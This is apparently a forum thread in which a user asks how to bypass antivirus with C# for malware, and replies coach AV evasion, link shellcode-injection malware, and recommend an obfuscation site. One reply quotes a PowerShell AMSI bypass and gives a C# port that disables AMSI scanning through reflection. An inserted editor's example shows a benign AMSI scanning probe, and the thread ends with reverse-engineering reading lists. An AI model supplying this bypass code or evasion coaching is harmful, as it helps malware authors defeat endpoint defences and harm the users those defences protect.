Hello everyone, I am learning C# because I want to bypass anti-viruses with C#. But I don't know how to learn about bypassing anti-viruses with C#.
Hey!!
Well, I'd recommend you first understand AVs, then learn some basic C#. One of the things about evading AV is understanding what is being detected.
You don't need to write in C, but this is a good read on understanding why the methods work
The following link has references and ideas on how to execute shellcode in your C# malware
This is a simple C# malware that injects and executes shellcode
If you look at how other researchers execute their malware using different methods, you can get an idea of how to write your own. Evasion is usually stuff like changing variable names, removing comments, different methods of execution, size, flow of execution, obfuscation. You can use these terms to research methods of evading AV, as they are used in different places (Go, PowerShell, C, F#, etc.)
Good Luck!
Hey @pryoc110. It should be noted that the C# programming language may not be the best for developing malware to evade antivirus. Microsoft recently integrated their Antimalware Scan Interface with the .NET Framework (Ashcraft, 2019), so in my non-expert opinion, only use C# AV avoidance techniques if you're up for a good challenge, especially if you're going to use the assembly in a real-life situation!
But if you really want to try to evade antivirus with a .NET assembly written in C#, I was able to find a few interesting projects and research that might be able to help you. Chandel (2022) discusses seven different techniques for bypassing the AMSI service. They're mostly applied to PowerShell, but I do think that with a bit of creativity you can implement them in C#.
For example, consider this snippet in Chandel’s article:
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)
This is referencing a function called amsiInitFailed() and trying to set it to true, so as to "trick", for lack of a better term, the interface into not scanning the assembly in question. Here is a simple PowerShell-to-C# pseudo-port that I whipped up (that I didn't bother to test; I'll leave that up to you ;-):
using System;
using System.Reflection;
using System.Runtime.InteropServices;

public class Programme {
    public static void Main(string[] args) {
        // Unmanaged buffer that stands in for the real AMSI context handle
        IntPtr mem = Marshal.AllocHGlobal(9076);
        // [Ref].Assembly in PowerShell is System.Management.Automation.dll,
        // so load that assembly and locate the internal AmsiUtils type
        Assembly sma = Assembly.Load("System.Management.Automation");
        Type amsiUtils = sma.GetType("System.Management.Automation.AmsiUtils");
        BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
        amsiUtils.GetField("amsiSession", flags).SetValue(null, null);
        amsiUtils.GetField("amsiContext", flags).SetValue(null, mem);
    }
}
There are also websites like amsi.fail that take in (specifically PowerShell) code and obfuscate and mangle it to the point that AMSI gets too confused to recognise the malicious nature of the thing. I do recommend using these as a starting point for getting your C# malware up and going.
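Editor's added example, not code from either reply above or from the projects they cite: the first reply says the key to evasion is "understanding what is being detected", and the second describes AMSI as the thing doing the detecting. Before trying to disable it, you can ask AMSI directly what it thinks of a buffer, using the documented exports of amsi.dll through P/Invoke. The constants come from amsi.h; the sample strings (a harmless PowerShell line and the EICAR test string) are constructed here for the demo. It assumes Windows 10 or later with an AMSI provider such as Microsoft Defender registered; which buffers get flagged is entirely up to that provider.

```csharp
using System;
using System.Runtime.InteropServices;
using System.Text;

// Added example: query the installed AMSI provider about arbitrary buffers.
// Assumes a Windows machine with a registered AMSI provider; results vary by engine.
public static class AmsiProbe
{
    [DllImport("amsi.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
    static extern int AmsiInitialize(string appName, out IntPtr amsiContext);

    [DllImport("amsi.dll", ExactSpelling = true)]
    static extern void AmsiUninitialize(IntPtr amsiContext);

    [DllImport("amsi.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
    static extern int AmsiScanBuffer(IntPtr amsiContext, byte[] buffer, uint length,
                                     string contentName, IntPtr amsiSession, out uint result);

    // AMSI_RESULT values from amsi.h
    const uint AMSI_RESULT_CLEAN = 0;
    const uint AMSI_RESULT_NOT_DETECTED = 1;
    const uint AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384;
    const uint AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479;
    const uint AMSI_RESULT_DETECTED = 32768;

    // Same rule as the AmsiResultIsMalware macro in amsi.h
    public static bool IsMalware(uint result) => result >= AMSI_RESULT_DETECTED;

    // Scan one buffer with a fresh context and no session; returns the raw AMSI_RESULT.
    public static uint Scan(string appName, byte[] buffer, string contentName)
    {
        IntPtr ctx;
        int hr = AmsiInitialize(appName, out ctx);
        Marshal.ThrowExceptionForHR(hr);
        try
        {
            uint result;
            hr = AmsiScanBuffer(ctx, buffer, (uint)buffer.Length, contentName, IntPtr.Zero, out result);
            Marshal.ThrowExceptionForHR(hr);
            return result;
        }
        finally
        {
            AmsiUninitialize(ctx);
        }
    }

    public static void Main(string[] args)
    {
        // Constructed samples: a benign script line, and the EICAR test string that every
        // mainstream engine is expected to flag. EICAR is split in two so that the source
        // file itself is not quarantined when saved to disk.
        string benign = "Write-Host 'hello'";
        string eicar = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$" + "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";

        foreach (var sample in new[] { ("benign.ps1", benign), ("eicar.txt", eicar) })
        {
            uint r = Scan("AmsiProbe", Encoding.UTF8.GetBytes(sample.Item2), sample.Item1);
            Console.WriteLine($"{sample.Item1}: AMSI_RESULT={r} malware={IsMalware(r)}");
        }
    }
}
```

Two things worth noticing when you run this. First, it is your own process asking for the scan, which is exactly what the PowerShell host does with the amsiContext the reply above nulls out: a reflection patch like that only affects scans the patched process itself requests, while a provider scanning the file on disk or another host process is untouched. Second, anything above AMSI_RESULT_DETECTED is a detection; values between the two BLOCKED_BY_ADMIN constants mean policy blocked it regardless of content, so do not read every non-zero result as "my payload was recognised".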
That's awesome! I'm going to learn from these great projects and knowledge.
Hi dude, I took your advice and went to learn some reversing knowledge, such as PE structure, assembly code, C and C++
Awww thanks
I am no expert, but here are some resources for you:
Books
- C++ Crash Course: A Fast-Paced Introduction (Lospinoso 2019)
- The Secret Life of Programs (Steinhart 2019)
- Practical Binary Analysis (Andriesse 2018)
- Practical Reverse Engineering (Dang et al. 2014)
- Ghidra Software Reverse Engineering for Beginners (David 2021)
Online Resources
- Malware Unicorn’s online resources: https://malwareunicorn.org/#/resources
- and of course Malware Unicorn’s workshops/labs: https://malwareunicorn.org/#/workshops
- There’s Hasherezade’s blog post to get you up to speed on learning malware analysis (and hence more about native PE executables): https://hshrzd.wordpress.com/how-to-start/
- Here is a YouTube course on reverse engineering: https://www.youtube.com/watch?v=fv9ii3W5htQ&list=PLHJns8WZXCdvaD7-xR7e5FJNW_6H9w-wC
- There’s VX Underground, which is just an amazing resource: https://www.vx-underground.org/
- Finally, and this is a bit self-promoting, but here is VX Reloaded, which is my personal project in writing malware for fun, not profit. I just have a simple Python file infector, but plan to add more stuff in the future! https://vxreloaded.github.io/
P.S. sorry for the late response
Thanks, friend. I will seriously study these resources you recommend.